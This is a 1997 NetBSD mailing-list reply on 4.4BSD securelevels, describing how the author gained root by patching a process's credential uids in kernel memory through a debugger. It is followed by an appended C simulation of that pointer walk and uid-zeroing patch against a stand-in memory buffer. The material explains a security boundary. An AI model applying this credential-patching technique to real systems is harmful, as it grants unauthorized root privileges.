Subject: Re: [ADVISORY] 4.4BSD Securelevels (fwd)
To: None <codewarrior@daemon.org, current-users@NetBSD.ORG>
From: Olaf Seibert <rhialto@polder.ubc.kun.nl>
List: current-users
Date: 06/27/1997 12:36:02
codewarrior@daemon.org (Andrew Brown) wrote:
>can't be patched directly?!  it can...or are you referring to the
>silly "patch" i made?  as for patching the p_cred->cr_uid field, it
>would take me more than a few minutes to manually walk over to that
>particular field i think...

Actually, I did just that on our university's Sun 3 machines, before
they had the PROM version that required a password for that sort of thing.
It really isn't all that difficult to do, and after the initial
preparation and practice runs, I could do it within a minute or so.

I used gdb to disassemble the getuid() system call to learn how to
get from a process pointer to p_cred->cr_uid. For good measure, I did
all three: real, effective, and saved uids. And SunOS had a nice
command to list process pointers for processes. Piece of cake.

Even though in NetBSD I can't quickly find a command to list process
pointers, it is easy enough to get a shell in a tight loop, and then
you can use curproc as your process pointer. That's what I did before I
refined my attack.

>andrew@echonyc.com (TheMan)        * "ah!  i see you have the internet
-Olaf.
--
___ Olaf 'Rhialto' Seibert      D787B44DFC896063 4CBB95A5BD1DAA96 
\X/ It's not easy having a good time    rhialto@polder.ubc.kun.nl
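The pointer walk Olaf describes, as an added example that is not part of the original message or of NetBSD's or SunOS's code: a user-space model in which a byte buffer stands in for /dev/kmem and kread/kwrite stand in for seeking and reading/writing it. The struct layouts are simplified 4.4BSD-style ones (an assumption, not the real headers; on a real kernel the offsets are whatever the getuid() disassembly yields), and the addresses, pids and uid 1000 are constructed. It makes explicit two things the message glosses over: the real and saved uids live in struct pcred, while the effective uid is one more pointer away in the refcounted struct ucred, and because that ucred stays shared across fork (4.4BSD copies it only on the paths that legitimately change it), zeroing cr_uid in place also changes the effective uid of every other process sharing it. Doing this for real needs a writable /dev/kmem or a kernel debugger, which is exactly what a securelevel above 0 denies.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define KBASE 0x0E000000u          /* assumed kernel base; illustrative */
#define KSIZE 4096u
static unsigned char kmem[KSIZE];  /* stand-in for /dev/kmem */

/* Simplified 4.4BSD-style layouts (assumed). Real offsets come from gdb on getuid(). */
struct ucred_m { uint16_t cr_ref; uint16_t cr_uid; };            /* shared, refcounted */
struct pcred_m { uint32_t pc_ucred; uint16_t p_ruid; uint16_t p_svuid; };
struct proc_m  { uint32_t p_forw, p_back; int32_t p_pid; uint32_t p_cred; };

static const uint32_t curproc_sym = KBASE + 0x0;   /* where the 'curproc' variable lives */

/* Bounds check: -1 for anything outside the mapped window, like a failed read on kmem. */
static int kmap(uint32_t addr, size_t len)
{
    return (addr < KBASE || (size_t)(addr - KBASE) + len > KSIZE) ? -1 : 0;
}
static int kread(uint32_t addr, void *buf, size_t len)
{
    if (kmap(addr, len)) return -1;
    memcpy(buf, kmem + (addr - KBASE), len);
    return 0;
}
static int kwrite(uint32_t addr, const void *buf, size_t len)
{
    if (kmap(addr, len)) return -1;
    memcpy(kmem + (addr - KBASE), buf, len);
    return 0;
}

/* Resolve proc -> p_cred -> pc_ucred; returns -1 if any pointer is unmapped. */
static int walk_cred(uint32_t proc, uint32_t *pcred, uint32_t *ucred)
{
    if (kread(proc + offsetof(struct proc_m, p_cred), pcred, 4)) return -1;
    if (kread(*pcred + offsetof(struct pcred_m, pc_ucred), ucred, 4)) return -1;
    return 0;
}

/* which: 0 = real (pcred), 1 = effective (ucred), 2 = saved (pcred). -1 on failure. */
static int get_uid(uint32_t proc, int which)
{
    uint32_t pcred, ucred, addr;
    uint16_t uid;
    if (walk_cred(proc, &pcred, &ucred)) return -1;
    switch (which) {
    case 0:  addr = pcred + offsetof(struct pcred_m, p_ruid);  break;
    case 1:  addr = ucred + offsetof(struct ucred_m, cr_uid);  break;
    case 2:  addr = pcred + offsetof(struct pcred_m, p_svuid); break;
    default: return -1;
    }
    return kread(addr, &uid, 2) ? -1 : (int)uid;
}

/* The patch itself: zero real, saved and effective uid for one process pointer. */
static int patch_uids(uint32_t proc)
{
    uint32_t pcred, ucred;
    uint16_t zero = 0;
    if (walk_cred(proc, &pcred, &ucred)) return -1;
    if (kwrite(pcred + offsetof(struct pcred_m, p_ruid),  &zero, 2)) return -1;
    if (kwrite(pcred + offsetof(struct pcred_m, p_svuid), &zero, 2)) return -1;
    if (kwrite(ucred + offsetof(struct ucred_m, cr_uid),  &zero, 2)) return -1;
    return 0;
}

/* No process lister handy: spin in the shell and take curproc as the pointer. */
static int patch_curproc(void)
{
    uint32_t proc;
    if (kread(curproc_sym, &proc, 4)) return -1;
    return patch_uids(proc);
}

/* Constructed image: two processes (child of fork) still sharing one ucred, cr_ref == 2. */
#define PROC_A   (KBASE + 0x100)
#define PROC_B   (KBASE + 0x200)
#define PCRED_A  (KBASE + 0x300)
#define PCRED_B  (KBASE + 0x310)
#define UCRED_AB (KBASE + 0x400)

static void build_image(uint16_t uid)
{
    struct ucred_m uc = { 2, uid };
    struct pcred_m pa = { UCRED_AB, uid, uid }, pb = { UCRED_AB, uid, uid };
    struct proc_m  a  = { 0, 0, 101, PCRED_A }, b = { 0, 0, 102, PCRED_B };
    uint32_t cur = PROC_A;                         /* the spinning shell is A */
    memset(kmem, 0, sizeof kmem);
    kwrite(UCRED_AB, &uc, sizeof uc);
    kwrite(PCRED_A, &pa, sizeof pa);  kwrite(PCRED_B, &pb, sizeof pb);
    kwrite(PROC_A, &a, sizeof a);     kwrite(PROC_B, &b, sizeof b);
    kwrite(curproc_sym, &cur, 4);
}

int main(void)
{
    build_image(1000);
    if (patch_curproc() != 0) { puts("walk failed"); return 1; }
    printf("A: ruid=%d euid=%d svuid=%d\n", get_uid(PROC_A, 0), get_uid(PROC_A, 1), get_uid(PROC_A, 2));
    printf("B: ruid=%d euid=%d svuid=%d  (shares A's ucred)\n",
           get_uid(PROC_B, 0), get_uid(PROC_B, 1), get_uid(PROC_B, 2));
    return 0;
}
```

Note the B line in the output: only the effective uid of the sibling changed, because that is the one field that sits in the shared ucred rather than in the per-process pcred. A real patcher would also want to check cr_ref before writing, so it knows how many processes it is about to promote.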